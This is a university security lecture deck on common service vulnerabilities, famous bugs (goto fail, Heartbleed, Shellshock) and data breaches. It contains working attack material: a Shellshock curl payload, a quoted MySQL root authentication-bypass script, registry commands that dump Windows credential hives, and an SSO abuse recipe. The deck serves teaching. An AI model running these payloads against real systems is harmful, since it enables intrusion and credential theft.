Deloitte ELTE vulnerabilities 2016 (source: compalg.inf.elte.hu/~attila/materials/ITbiztonsag_02_serulekenyseg...)
Vulnerability analysis
Spala Ferenc, Deloitte Zrt.
ELTE IK – 2016
Introduction
ELTE ProgTervMat (2008)
Senior Manager @ Deloitte
Program committee chair @ Hacktivity
spala.ferenc @ {gmail, facebook}
FerencSpala @ Twitter
securityminutes.com
Concepts
Hacker / Cracker: flame war!
White / black / grey hat hacker: media compatibility RULZ!
Anonymous =? hackers: flame war 2
So who is a hacker?
"A hacker is someone who thinks outside the box. It's someone who discards conventional wisdom, and does something else instead. It's someone who looks at the edge and wonders what's beyond. It's someone who sees a set of rules and wonders what happens if you don't follow them. A hacker is someone who experiments with the limitations of systems for intellectual curiosity." (Bruce Schneier)
Hacker =? Geek
Read it once more!
Do you see the words computer, virus, network, break-in or password in there?
Being able to break into something does not make someone a hacker!
And joining Anonymous certainly does not!
This is hacking!
Hacker =? Geek
Mathematicians cleaned out an American lottery (Index, 2011.08.03)
… a few mathematicians and programmers from MIT got together and started doing the math …
No, they did not cheat and they did not break into anything: they thought it through and worked out where the loophole was.
This is hacking!
Consultant vs. hacker: there is an overlap!
Consultant =? hacker in a suit
Consultant =? Hacker++
Consultant =? hacker + communication
Always know what you are shooting at!
Interesting cases
FTP (tcp/21)
Unencrypted
Anonymous login
Directories writable/readable by anyone
Backdoor
Buffer overflow
Brute force
On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor.
SSH (tcp/22)
PermitRootLogin
SSHv1 support
Buffer overflow
Brute force
F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.
Telnet (tcp/23)
Unencrypted
Brute force
Buffer overflow
SMTP (tcp/25)
Unencrypted
Brute force
Buffer overflow
User enumeration (VRFY, EXPN, REPLY-TO)
E-mail relaying
A remote code execution flaw in Exim has been discovered by an internal audit performed by the Exim developers[2]. This vulnerability may lead to arbitrary code execution with the privileges of the user executing the Exim daemon. In some circumstances this may lead to privilege escalation.
DNS (udp/53, tcp/53)
Unencrypted
Anonymous zone transfer
DNS cache poisoning
The Dan Kaminsky bug: http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html
Buffer overflow
HTTP (tcp/80), HTTPS (tcp/443)
Unencrypted (HTTP)
HTTP methods (TRACE, PUT, DELETE)
Directory listing
HTTP Parameter Splitting
Buffer overflow
WebDAV (cadaver)
+ Tomcat, JBoss, WebSphere, GlassFish, …
+ Bugs in web applications!
SSL - Apple (iOS)
https://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/
You don't really need any knowledge of C, or even of programming, to understand the error here.
The programmer is supposed to calculate a cryptographic checksum of three data items - the three calls to SSLHashSHA1.update() - and then to call the all-important function sslRawVerify().
If sslRawVerify() succeeds, then err ends up with the value zero, which means "no error", and that's what the SSLVerifySignedServerKeyExchange function returns to say, "All good."
But in the middle of this code fragment, you can see that the programmer has accidentally (no conspiracy theories, please!) repeated the line goto fail;.
The first goto fail happens if the if statement succeeds, i.e. if there has been a problem and therefore err is non-zero.
This causes an immediate "bail with error," and the entire TLS connection fails.
But because of the peccadilloes of C, the second goto fail, which shouldn't be there, always happens if the first one doesn't, i.e. if err is zero and there is actually no error to report.
The result is that the code leaps over the vital call to sslRawVerify(), and exits the function.
This causes an immediate "exit and report success", and the TLS connection succeeds, even though the verification process hasn't actually taken place.
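As an added example (not Apple's code and not from the original slides), a stripped-down C model of the control flow described above: hash_update() and raw_verify() are stand-ins for SSLHashSHA1.update() and sslRawVerify(), the three inputs are constructed, and the vulnerable function is shown next to the fixed one so the effect of the stray line can be checked directly.

```c
/* Added example, not Apple's code: a model of the
 * SSLVerifySignedServerKeyExchange control flow. hash_update() and
 * raw_verify() are stand-ins for SSLHashSHA1.update() and sslRawVerify();
 * the duplicated "goto fail;" line is the real bug. */
#include <stddef.h>
#include <stdint.h>

#define ERR_NONE     0
#define ERR_HASH    (-1)
#define ERR_BAD_SIG (-2)

/* Stand-in hash: a running byte sum, so no crypto library is needed. */
static int hash_update(uint32_t *ctx, const uint8_t *buf, size_t len) {
    if (buf == NULL) return ERR_HASH;
    for (size_t i = 0; i < len; i++) *ctx += buf[i];
    return ERR_NONE;
}

/* Stand-in verify: the "signature" is valid iff it equals the digest. */
static int raw_verify(uint32_t digest, uint32_t signature) {
    return digest == signature ? ERR_NONE : ERR_BAD_SIG;
}

/* Vulnerable: the second goto is unconditional, so when the update
 * succeeds (err == 0) control jumps to fail: with err still 0, skipping
 * raw_verify() and reporting success for any signature at all. */
int verify_vulnerable(const uint8_t *a, const uint8_t *b, const uint8_t *c,
                      size_t len, uint32_t signature) {
    uint32_t ctx = 0;
    int err;
    if ((err = hash_update(&ctx, a, len)) != 0)
        goto fail;
    if ((err = hash_update(&ctx, b, len)) != 0)
        goto fail;
        goto fail;                     /* the accidental duplicate line */
    if ((err = hash_update(&ctx, c, len)) != 0)
        goto fail;
    err = raw_verify(ctx, signature);  /* never reached */
fail:
    return err;
}

/* Fixed: the same function with the stray goto removed. */
int verify_fixed(const uint8_t *a, const uint8_t *b, const uint8_t *c,
                 size_t len, uint32_t signature) {
    uint32_t ctx = 0;
    int err;
    if ((err = hash_update(&ctx, a, len)) != 0) goto fail;
    if ((err = hash_update(&ctx, b, len)) != 0) goto fail;
    if ((err = hash_update(&ctx, c, len)) != 0) goto fail;
    err = raw_verify(ctx, signature);
fail:
    return err;
}

typedef int (*verify_fn)(const uint8_t *, const uint8_t *, const uint8_t *,
                         size_t, uint32_t);
/* Runs fn over three constructed 4-byte inputs; their byte sum, i.e. the
 * stand-in digest, is 78, so 78 is the only signature that should verify. */
#define GOOD_SIGNATURE 78u
#define BAD_SIGNATURE  0xDEADBEEFu
int run_verify(verify_fn fn, uint32_t signature) {
    const uint8_t a[4] = {1, 2, 3, 4}, b[4] = {5, 6, 7, 8}, c[4] = {9, 10, 11, 12};
    return fn(a, b, c, sizeof a, signature);
}
```

With BAD_SIGNATURE the vulnerable function still returns ERR_NONE, while the fixed one returns ERR_BAD_SIG and only accepts GOOD_SIGNATURE.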
SSL (Heartbleed) - OpenSSL
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
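An added example, not OpenSSL's code and not from the slide deck: a C model of the TLS heartbeat handler that shows the missing length check behind the memory disclosure. The record layout follows the heartbeat format (type, 2-byte length, payload, padding); the "peer memory" with a record and unrelated adjacent bytes is constructed for the example.

```c
/* Added example, not OpenSSL's code: a model of the TLS heartbeat handler.
 * A heartbeat record is 1 byte type, a 2-byte payload length, the payload,
 * then at least 16 bytes of padding. The vulnerable handler trusts the
 * length field; the fixed one checks it against the bytes actually received. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HB_REQUEST 1
#define HB_PADDING 16

/* Constructed "peer memory" (48 bytes, zero-filled past the initialiser):
 * a 23-byte record whose length field claims 32 bytes of payload but carries
 * only 4, followed by unrelated data that happens to be adjacent in memory. */
#define RECORD_LEN (1 + 2 + 4 + HB_PADDING)
static const uint8_t peer_mem[48] = {
    HB_REQUEST, 0x00, 0x20,                          /* type, claimed length 32 */
    'p', 'i', 'n', 'g',                              /* actual 4-byte payload */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  /* 16 bytes of padding */
    'S', 'E', 'C', 'R', 'E', 'T', ':', 'h', 'u', 'n', 't', 'e', 'r', '2'
};

typedef int (*hb_fn)(const uint8_t *, size_t, uint8_t *, size_t);

/* Vulnerable: copies payload_len bytes wherever the peer's length field
 * points, so the response echoes whatever follows the record. Returns the
 * number of payload bytes echoed, or -1 if the request is refused. */
int heartbeat_vulnerable(const uint8_t *rec, size_t rec_len, uint8_t *out, size_t out_cap) {
    (void)rec_len;                                   /* never consulted: the bug */
    if (rec[0] != HB_REQUEST) return -1;
    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];
    if (payload_len > out_cap) return -1;            /* only guards the response buffer */
    memcpy(out, rec + 3, payload_len);               /* reads past the 23-byte record */
    return (int)payload_len;
}

/* Fixed: refuse any record whose claimed payload plus header and padding
 * does not fit inside the bytes that were actually received. */
int heartbeat_fixed(const uint8_t *rec, size_t rec_len, uint8_t *out, size_t out_cap) {
    if (rec_len < 1 + 2 + HB_PADDING || rec[0] != HB_REQUEST) return -1;
    size_t payload_len = ((size_t)rec[1] << 8) | rec[2];
    if (1 + 2 + payload_len + HB_PADDING > rec_len) return -1;   /* the missing check */
    if (payload_len > out_cap) return -1;
    memcpy(out, rec + 3, payload_len);
    return (int)payload_len;
}

/* Feeds the constructed record to fn: -1 if refused, 1 if the echoed payload
 * carries the unrelated "SECRET" bytes (they start 20 bytes in), else 0. */
int run_heartbeat(hb_fn fn) {
    uint8_t resp[64];
    int n = fn(peer_mem, RECORD_LEN, resp, sizeof resp);
    if (n < 0) return -1;
    return (n >= 26 && memcmp(resp + 20, "SECRET", 6) == 0) ? 1 : 0;
}

/* A well-formed request (length field 4 matches the 4-byte payload) is
 * still answered by the fixed handler; returns the echoed length. */
int run_honest_request(void) {
    uint8_t rec[RECORD_LEN] = { HB_REQUEST, 0x00, 0x04, 'p', 'i', 'n', 'g' };
    uint8_t resp[64];
    return heartbeat_fixed(rec, sizeof rec, resp, sizeof resp);
}
```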
ShellShock
Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system.
This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
Oracle (TCP/1521)
Unencrypted (it can be)
Weak "SYS"/"SYSTEM" password
Privileges
TNS poisoning
"…was fixed in future releases of the product."
TNS POISONING (sequence diagram 1; participants: Listener, tnspoison, Victim; messages: Connect, Resend, Connect, Accept, Authentication, Data)
TNS POISONING (sequence diagram 2; participants: Listener, tnspoison, Victim; messages: Connect, Redirect, Register, Register)
Databases - MySQL
```python
#!/usr/bin/python
# This has to be the easiest "exploit" ever. Seriously.
# Embarrassed to submit this a little.
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
```
HP Data Protector
Bug fixing, PHP style
CVE-2012-0830: The php_register_variable_ex function in php_variables.c in PHP 5.3.9 allows remote attackers to execute arbitrary code via a request containing a large number of variables, related to improper handling of array variables. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4885.
An example from the past - Custom SSO
The client (the browser) gets to decide which server is the authentication server?!?!
1. You work out what the authentication protocol is
2. You build your own "server"
3. You "set" your own server as the value of the "authCheckSiteServer" parameter
4. $$ Profit $$
SNMP 2 Domain Admin
SNMP public
Linux post exploitation
Login - Dump - GOTO 1
Password dump
reg save HKLM\security security.reg
reg save HKLM\system system.reg
reg save HKLM\sam sam.reg
+ secretsdump.py
Metasploit / incognito
Metasploit / mimikatz
Interesting cases - Data theft
383 companies in 12 countries
4M USD loss on average
A stolen record cost the companies 158 USD on average
You can take out insurance against data theft!
48% of data thefts/leaks were caused by malicious attacks
"For our consolidated sample of 350 companies, we estimate a mean time to identify at 206 days with a range of 20 to 582 days"
Full report: http://www-03.ibm.com/security/data-breach/
mail.ru hack
The largest Russian "Internet company": e-mail, portals, social media, search, chat, cloud storage, online games
25 million records were stolen in August 2016 (username, e-mail, password, date of birth)
cfire.mail.ru: 13 million (6 million passwords cracked in <1 month)
parapa.mail.ru (website): 5 million (3 million passwords cracked in <1 month)
parapa.mail.ru (forum): 4 million (3 million passwords cracked in <1 month)
tanks.mail.ru: 3 million (0 passwords cracked)
How did they get in?
• They found an SQL injection in an old vBulletin forum
• It was a publicly known bug
Nobody knows who it was…
AshleyMadison
An online dating site specifically for people who want to cheat: "Life is short. Have an affair."
The data of probably every user was accessed: 37 million records
The site claimed (before the hack) that for a one-time $19 fee a user's data would be deleted permanently
After the hack it turned out that this had not happened
• Incidentally, they earned $1.7M from this fee in 2014 alone
The attackers may have been inside their network for years
The company was sued for 578 million USD in Canada for failing to protect/delete personal data properly
Allegedly two suicides are also linked to the data leak
The site offered a $500,000 Canadian dollar reward for information leading to the attackers
Thank you for your attention!
Spala Ferenc, Senior Manager, Deloitte Zrt.
spala.ferenc @ {gmail, facebook}
FerencSpala @ Twitter
securityminutes.com
Feedback form: http://compalg.inf.elte.hu/~attila/Teaching.html